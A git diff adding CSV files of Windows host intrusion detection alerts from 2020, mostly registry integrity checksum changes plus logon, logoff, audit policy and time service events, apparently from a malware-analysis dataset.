+Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '06f3d2f39343f57d32dd262e225aae84' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : 'cc04983290ed793a09187d5412932856395b581c' +", +"Apr 24, 2020 @ 10:58:37.734",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1464110 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.137.137.111:123) is working properly.""" +"Apr 24, 2020 @ 10:58:36.952",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '806bbd1c931a136515484e6569a41608' +New md5sum is : '7ad8870899ca2bf54b124825022fe0c6' +Old sha1sum was: 'b8cf0a58f8b186a12ee578719764e738cd881df5' +New sha1sum is : 'f0e34e29b93cf8d052ac5aea621d98e83c13b488' +", +"Apr 24, 2020 @ 10:58:36.922",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '8776cf6928f2de374d1a329d7b0948c3' +New md5sum is : 'b863e575b2cca664b99a881713f146c2' +Old sha1sum was: '520ae6cd4e088c14c27c500ba09b18024715ec29' +New sha1sum is : '95491db26e7e8c0fbc75daa3bcebc862313c84ff' +", +"Apr 24, 2020 @ 10:57:51.951",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:11:00Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:57:48.129",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:57:43.103",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 10:57:17.821",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:11:26Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:57:14.912",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 10:56:15.156",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 10:56:15.125",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 10:56:08.897",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. 
+Old md5sum was: '1af7f0914012f801bdabc07119bd84db' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +", +"Apr 24, 2020 @ 10:56:07.798",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '1e9409baa8b68f8d5dfa081e75151003' +New md5sum is : '47f9a8fc035cc80b23dfd8be4d23cda6' +Old sha1sum was: '25555a4f57a7b2144caabaf450eb56fe7119a8c0' +New sha1sum is : '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +", +"Apr 24, 2020 @ 10:56:07.782",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '4c17291dcd0de9eb46f1bf8312d3f109' +New md5sum is : '480a7b1436febced63b663e198db057e' +Old sha1sum was: 'a02aa7cd463261dc68ec18a39291b1918d32122d' +New sha1sum is : 'a366c53c7d877bd13ac0386830dbad1b52127af9' +", +"Apr 24, 2020 @ 10:55:57.125",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: '21a66dac78117659043a8212e1fc5a78' +New md5sum is : 'f7ede040f0bd50f2432cce9ba9720243' +Old sha1sum was: 'bb97bea171f11b2b6ad914cdf6a4d15847c5eca4' +New sha1sum is : '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +", +"Apr 24, 2020 @ 10:55:57.031",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'e9cd6bb35ae467549f2219ff79f022f0' +New md5sum is : 'bbd3c2d027909fd8ca60e5fb29be1c11' +Old sha1sum was: '62e90089ff5bb614d8c46dc0c962555ef30f1362' +New sha1sum is : '840961701b92e0a0bb75a3c992b2e764bb835d51' +", +"Apr 24, 2020 @ 10:55:55.032",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'aca3c8183dee70cfc9f8f83812ae827e' +New md5sum is : '4256845286e0a414097e9c63c150cb5d' +Old sha1sum was: 'f13a6d9ea63bbb6928aba46969a7afa088985abf' +New sha1sum is : '684a425e096a2850d4c8dc9679a024c65fd89a91' +", +"Apr 24, 2020 @ 10:55:54.985",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\Config' checksum changed. +Old md5sum was: '87de3be2e62ab7a015cb40d00caf019c' +New md5sum is : '152ffb3382f568382dfd7c66cbef2454' +Old sha1sum was: '4b47a0aa6a1632c049dc4216dabba9c8ddc01020' +New sha1sum is : 'd2e3bd3fc5942eaf7c0b8ebc889b0f232921b146' +", +"Apr 24, 2020 @ 10:55:54.328",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'c361117616a05d4278b52bebd6da3141' +New md5sum is : '7b25497674cc671619a3e52c5a6b72e8' +Old sha1sum was: 'ec1bd80ed1806a52ea2bf63712d2625626a71bc5' +New sha1sum is : 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +", +"Apr 24, 2020 @ 10:55:54.298",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\SPP' checksum changed. +Old md5sum was: '56bc0c6128b57ea5a28d9f47d40c9e81' +New md5sum is : '405816ce4a643fd7af522b6080aabae6' +Old sha1sum was: '52aac2eaca3d50ad4da73141f58cb0f698cf0358' +New sha1sum is : '47a12735fc5bb600f938079cc3d8f90fca52afb0' +", +"Apr 24, 2020 @ 10:55:52.907",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. 
+Old md5sum was: '544514e57047c2570309981465630650' +New md5sum is : 'acae9dc748745942263a86d7eb614be0' +Old sha1sum was: '806ec5bc628010b8292a8f9a147a3c4e5f55b8d7' +New sha1sum is : '426e630d1ce4b54eb126567e177155a4f7a507fa' +", +"Apr 24, 2020 @ 10:55:52.641",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '6c9fa8f349691cfc6474afbfb85a26d0' +New md5sum is : '73ff3da5b491b534e4f1fca73d797712' +Old sha1sum was: 'cf2a4ead8cc286234f64909716907d8e036d500a' +New sha1sum is : '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +", +"Apr 24, 2020 @ 10:55:52.032",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '8ac497b048ccef73c4ecb361aa3ffac8' +New md5sum is : 'd73c739d94aff99e2de6c480608f2631' +Old sha1sum was: 'a57ddc3084097c99fcffcfb1e624035b13112910' +New sha1sum is : 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +", +"Apr 24, 2020 @ 10:55:51.799",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '963ffd284ab17477c4d656c4f2614c4f' +New md5sum is : '057b39f9a279a74ae6e39c10634a6eab' +Old sha1sum was: 'c0ea9cb87fbded9044c0d4731c687543eb23962a' +New sha1sum is : 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +", +"Apr 24, 2020 @ 10:55:51.047",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '544514e57047c2570309981465630650'
+New md5sum is : 'acae9dc748745942263a86d7eb614be0'
+Old sha1sum was: '806ec5bc628010b8292a8f9a147a3c4e5f55b8d7'
+New sha1sum is : '426e630d1ce4b54eb126567e177155a4f7a507fa'
+",
+"Apr 24, 2020 @ 10:55:48.688",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed.
+Old md5sum was: 'b3b59054b8589793cbece5beceb9b2c2'
+New md5sum is : 'ae5aeacd0ec096e337ca3ae6a707a5ef'
+Old sha1sum was: '738937cb2816c41b94634becd9c75cffa63c519b'
+New sha1sum is : 'cc73062438c2d276ae920c586c61e8046d7af96f'
+",
+"Apr 24, 2020 @ 10:55:45.172",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed.
+Old md5sum was: 'b7992042185fc6ec85e366e31893c993'
+New md5sum is : '3d3a643354245020081ae89e531e5f43'
+Old sha1sum was: '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad'
+New sha1sum is : '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e'
+",
+"Apr 24, 2020 @ 10:55:44.235",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SmsRouter\State\Registration\Map' checksum changed.
+Old md5sum was: '6f0e8dd0745c85a63da5b9c4048cf7a8'
+New md5sum is : 'f725bdba3c624ef1211452f438569838'
+Old sha1sum was: 'ff5df2055e8b84f88f69ce4e022f276cddd9ae0c'
+New sha1sum is : '76d6ea0f40d643341bc4517a2d1b043f15ea0c6b'
+",
+"Apr 24, 2020 @ 10:55:42.907",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed.
+Old md5sum was: '635e192cad83fcc0e1b59bc4458960b4'
+New md5sum is : '5689c2dd6ed61a04cc389b6099c0aea5'
+Old sha1sum was: 'e0e382309ad45d83861d26b3d86c0fab6345eb7b'
+New sha1sum is : '64932df77c40a56e97edb3553ce359b3aaff132e'
+",
+"Apr 24, 2020 @ 10:55:42.844",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed.
+Old md5sum was: 'dc9f9e3fba782230828c1350ebdd6327'
+New md5sum is : '5de0ef21cee3c7b87f2fab30b8b06e2e'
+Old sha1sum was: 'df82c4e7b328c25ab2a829fbb36079904d347a00'
+New sha1sum is : '95450da791d27d0a0e456663988211c24b30dbec'
+",
+"Apr 24, 2020 @ 10:55:42.828",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed.
+Old md5sum was: 'bd9b4beaac92fe5749542b077fdeffd0'
+New md5sum is : 'f93cf0221c7bffcbf0606d9f193a943e'
+Old sha1sum was: '770460c89c9b82b0c4bc82f78b714a907c62fe5a'
+New sha1sum is : '098e4d9f53900d4e8394afe508e54240c78b74ad'
+",
+"Apr 24, 2020 @ 10:55:41.737",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:10:50Z. Reason: RulesEngine."""
+"Apr 24, 2020 @ 10:55:38.236",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed.
+Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7'
+New md5sum is : 'b94f00fb649e58278413ddb218687776'
+Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651'
+New sha1sum is : '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7'
+",
+"Apr 24, 2020 @ 10:55:31.282",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed.
+Old md5sum was: '50e564d651df4ed3711c530cb99d635a'
+New md5sum is : '774e15e7baf44381d722db864ab890d7'
+Old sha1sum was: '9f85b67a6c52e8312f838e2577ad0927a069eeda'
+New sha1sum is : '469daffaef7546bd68eba730d238e5592de9f468'
+",
+"Apr 24, 2020 @ 10:55:29.329",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed.
+Old md5sum was: '994c45f15282cc5a92f237967d96fef5'
+New md5sum is : '5727fcd23252b0e1550791766fd7e652'
+Old sha1sum was: '88530f962585446daf77f46e080d8b08c8e98a2c'
+New sha1sum is : '1a0a4badb9ef02d3f518064090d622844165b266'
+",
+"Apr 24, 2020 @ 10:55:27.563",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed.
+Old md5sum was: '4eb2a07540b08107a0625ee3e4611bbc'
+New md5sum is : '71d14a2d2a756124273e36b0738f8bba'
+Old sha1sum was: '343b58bbd290264a88f73a3bbfdb8c0877c5bb8e'
+New sha1sum is : 'c605e5d23f62dcaf8235115a11a8363912e96ea2'
+",
+"Apr 24, 2020 @ 10:55:26.610",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed.
+Old md5sum was: 'fcd2bde063d08e3e493bd9b171932f62'
+New md5sum is : 'b4bce65b22aa4a519547960a719662c4'
+Old sha1sum was: '0154114214c1947389b713ef77c27205b797facc'
+New sha1sum is : '3dac9d974e4d5d554b03c5e46ca8acc22b4826b6'
+",
+"Apr 24, 2020 @ 10:55:22.300",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed.
+Old md5sum was: 'a836bd80394300540414e863397687ad'
+New md5sum is : 'df3256a25e140f891367ef4f45e45db2'
+Old sha1sum was: '10c4d918d67affeb805f43db3431644b1b028a63'
+New sha1sum is : 'e2d4eee52f1f6550a2d64d496dfa6aa49e9a8351'
+",
+"Apr 24, 2020 @ 10:55:20.954",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed.
+Old md5sum was: '735c3ab6e8ca71e23614002bbb028249'
+New md5sum is : '5727fcd23252b0e1550791766fd7e652'
+Old sha1sum was: 'd5a88f2cb188c5047330cafcb78ced9235190617'
+New sha1sum is : '1a0a4badb9ef02d3f518064090d622844165b266'
+",
+"Apr 24, 2020 @ 10:55:18.313",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed.
+Old md5sum was: '27f0b0536743e3de8fcd99c86a2544f2'
+New md5sum is : '1f47b7195d8fed9969326bd01db47d06'
+Old sha1sum was: '735e4f181b67d19525042b6d7dd870ffedcd3c0c'
+New sha1sum is : 'ee63ae916c97b341f744e3bde4a840cc48ac014b'
+",
+"Apr 24, 2020 @ 10:55:17.783",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\GoogleChromeElevationService' checksum changed.
+Old md5sum was: '7623ffed143b7459169ba5677dbcbf32'
+New md5sum is : '8689e28cb67cdeb16cd0f213c561238e'
+Old sha1sum was: '0a808618d3ad142d9f619d043ca088fdcfc9a841'
+New sha1sum is : '9a0d97c845587be7605acb61023bb439126934df'
+",
+"Apr 24, 2020 @ 10:55:17.720",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed.
+Old md5sum was: 'e72eae0fec329e0227c0acc6aad332c2'
+New md5sum is : '5727fcd23252b0e1550791766fd7e652'
+Old sha1sum was: '2b49b1970c5bb2cfdd9508be50951510ea0093de'
+New sha1sum is : '1a0a4badb9ef02d3f518064090d622844165b266'
+",
+"Apr 24, 2020 @ 10:55:16.643",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed.
+Old md5sum was: 'ae9643074ec7a4ef81bb63a482e527c9'
+New md5sum is : '8babdce3ab05d3473a80df927d06237f'
+Old sha1sum was: 'bb90e1460f2a74046f7b573529a69b9faa6b3a52'
+New sha1sum is : 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3'
+",
+"Apr 24, 2020 @ 10:55:13.595",3,"Windows User Logoff",,"""An account was logged off.
+
+Subject:
+ Security ID: S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-6904
+ Account Name: sshd_6904
+ Account Domain: VIRTUAL USERS
+ Logon ID: 0x103CAE
+
+Logon Type: 5
+
+This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."""
+"Apr 24, 2020 @ 10:55:13.516",3,"IIS NetworkCleartext Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 8
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-21-438079597-2123118846-2669748851-1001
+ Account Name: John Williams
+ Account Domain: DESKTOP-HUE026H
+ Logon ID: 0x10E24E
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x1af8
+ Process Name: C:\Windows\System32\OpenSSH\sshd.exe
+
+Network Information:
+ Workstation Name: DESKTOP-HUE026H
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 24, 2020 @ 10:55:13.362",3,"Windows Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x24c
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 24, 2020 @ 10:55:13.161",3,"Windows Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x24c
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
diff --git a/data/MW_1_HIDS_3.csv b/data/MW_1_HIDS_3.csv
new file mode 100644
index 0000000..7d9c135
--- /dev/null
+++ b/data/MW_1_HIDS_3.csv
@@ -0,0 +1,395 @@
+timestamp,"rule.level","rule.description","data.win.system.message","full_log"
+"May 22, 2020 @ 15:34:48.419",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0'
+New md5sum is : '05688d3fb01c8753b031688cb1be8a9a'
+Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9'
+New sha1sum is : '07d2e2efcc0eef4f0950f87eb46ce7cb7d621014'
+"
+"May 22, 2020 @ 15:34:48.415",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '89598d32459256342f73e9b832b618dc'
+New md5sum is : 'b9b17232ab989d43145b713d83b31e56'
+Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643'
+New sha1sum is : '59a9b4d3dd2bb5573d31e1aff08c6d38bf7d7d43'
+"
+"May 22, 2020 @ 15:34:46.106",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed.
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e'
+New md5sum is : '497a8c7081c737f07c267a30b1538ff9'
+Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e'
+"
+"May 22, 2020 @ 15:34:31.496",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed.
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e'
+New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da'
+Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06'
+"
+"May 22, 2020 @ 15:34:12.594",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{00080000-B1BA-11CE-ABC6-F5B2E79D9E3F}' checksum changed.
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e'
+New md5sum is : '47bd772cab29cc8ea332945ac72cdd4a'
+Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+New sha1sum is : '308d94b65326a36b3f8d9e5dcb729d52b07b5a23'
+"
+"May 22, 2020 @ 15:33:15.454",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,
+"May 22, 2020 @ 15:33:08.077",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",
+"May 22, 2020 @ 15:32:11.009",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed.
+Old md5sum was: '497a8c7081c737f07c267a30b1538ff9'
+New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e'
+Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e'
+New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+"
+"May 22, 2020 @ 15:32:10.978",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed.
+Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da'
+New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e'
+Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06'
+New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+"
+"May 22, 2020 @ 15:32:10.962",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{00080000-B1BA-11CE-ABC6-F5B2E79D9E3F}' checksum changed.
